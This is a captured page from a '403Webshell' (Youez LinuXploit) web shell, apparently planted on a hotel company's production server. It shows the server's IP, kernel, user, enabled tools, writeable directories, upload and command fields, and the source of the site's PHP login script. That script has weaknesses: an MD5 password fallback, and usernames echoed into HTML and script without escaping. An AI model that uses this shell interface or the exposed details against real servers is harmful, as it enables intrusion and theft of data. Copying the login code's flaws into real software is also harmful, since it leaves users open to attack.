403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/hotel-prod/public_html/mod/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/hotel-prod/public_html/mod/home.php
<?php
	if ($_POST['login_submitted'] == '1') :
		if (empty($_POST['user_id'])) :
			$err_login = 'Invalid login credentials!';
			$err_flag = true;
		endif;
		if (empty($_POST['login_pwd'])) :
			$err_login = 'Invalid login credentials!';
			$err_flag = true;
		endif;
		if (!$err_flag) :
			$sql = "SELECT * FROM sys_users WHERE user_name = ".$db->quote(trim($_POST['user_id']))." AND active = 1";
			//echo $sql.'<br />';
			$result = $db->query($sql) or die('Database Error!');
			//echo $sql.' result: '.$result->rowCount().' === '.md5($_POST['login_pwd']);
			if ($result->rowCount() > 0) :
				$row = $result->fetch(PDO::FETCH_OBJ);
				$bln_password_match = false;
				if (password_verify($_POST['login_pwd'], $row->password)) :
					$bln_password_match = true;
				elseif (strtoupper(md5($_POST['login_pwd'])) == strtoupper($row->password)) :
					$sql = "UPDATE sys_users set ".
						"password = ".$db->quote(trim(password_hash($_POST['login_pwd'], PASSWORD_BCRYPT)))." ".
						"WHERE user_id = '".$row->user_id."'";
					$db->query($sql) or die('Database Error!');
					$bln_password_match = true;
				else :
					$err_login = 'Invalid login credentials!';
					$err_flag = true;
				endif;
				if ($bln_password_match) :
					$_SESSION['user_id'] = $row->user_id;
					$_SESSION['user_name'] = $row->user_name;
					$_SESSION['logged_in'] = true;
					$_SESSION['user_full_name'] = $row->full_name;
					$_SESSION['user_email'] = $row->email;
					$_SESSION['user_admin'] = $row->admin;
					$_SESSION['password_expired'] = $row->password_expired;
					$_SESSION['roles'] = '';
					/*
					if ($row->admin == 1) :
						$_SESSION['roles'] .= 'admin';
					endif;
					*/
					$_SESSION['rand_key'] = generate_random_string(32);
					write_log('I', $_SESSION['user_id'], 'User '.$_SESSION['user_full_name'].' logged on');
					if ($_POST['remember_me'] == 1) :
						echo "<SCRIPT>setCookie('HotelDB_UserID','".$_SESSION['user_name']."',180);</SCRIPT>";
					else :
						echo "<SCRIPT>setCookie('HotelDB_UserID','".$_SESSION['user_name']."',-180);</SCRIPT>";
					endif;
					if ($row->password_expired == 1) :
						$_SESSION['password_expired'] = true;
						$next_page = 'password_form';
					else :
						$ar_roles = explode(',', get_roles());
						if (!empty($ar_default_start[$ar_roles[0]])) :
							$next_page = $ar_default_start[$ar_roles[0]];
						else :
							$next_page = 'hotels';
						endif;
					endif;
					echo "<SCRIPT>";
					echo "window.location.href = 'index.php?IX=".$next_page."'";
					echo "</SCRIPT>";
				else :
					$err_login = 'Invalid login credentials!';
					$err_flag = true;
				endif;
			else :
				$err_login = 'Invalid login credentials!';
				$err_flag = true;
			endif;
		endif;
	else:
		if (!empty($_COOKIE['HotelDB_UserID'])) :
			$remember_me = 'checked="checked"';
			$form_user_id = $_COOKIE['HotelDB_UserID'];
		else :
			$remember_me = '';
		endif;
	endif;

?>

<script>
	$(document).ready(function()	
	{
		$('.home_cell_background').mouseover(function() {
				$(this).parent('div').find('.home_cell_text').show();
			});
		$('.home_cell_text').mouseout(function() {
				$(this).hide();
			});
	});
</script>
<div class="home_login">
	<form style="" name="frm_login" id="frm_login" method="post" action="">
		<input name="login_submitted" type="hidden" value="1" />
		<input name="salt2" id="salt2" type="hidden" value="" />
		<input name="pwd_new_sha" id="pwd_new_sha" type="hidden" value="" />
		<div class="input_field">
			<label for="user_id">User ID</label>
			<input class="login_text" name="user_id" id="user_id" type="text" maxlength="40" value="<?php echo $form_user_id ?? NULL; ?>" />
		</div>
		<div class="input_field">
			<label for="login_pwd">Password</label>
			<input class="login_text" name="login_pwd" id="login_pwd" type="password" maxlength="150" value="" />
		</div>
		<div class="input_field">
			<input name="remember_me" type="checkbox" value="1" <?php echo $remember_me ?? NULL; ?> style="" /> Remember me
		</div>
		<div class="button_block center">
			<input type="submit" value="Login" />
		</div>
		<div class="input_field center">
			<?php show_form_error($err_login ?? NULL) ?>
		</div>
		<div class="center">
			<a href="passwordreset">Forgot password?</a>
		</div>
	</form>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit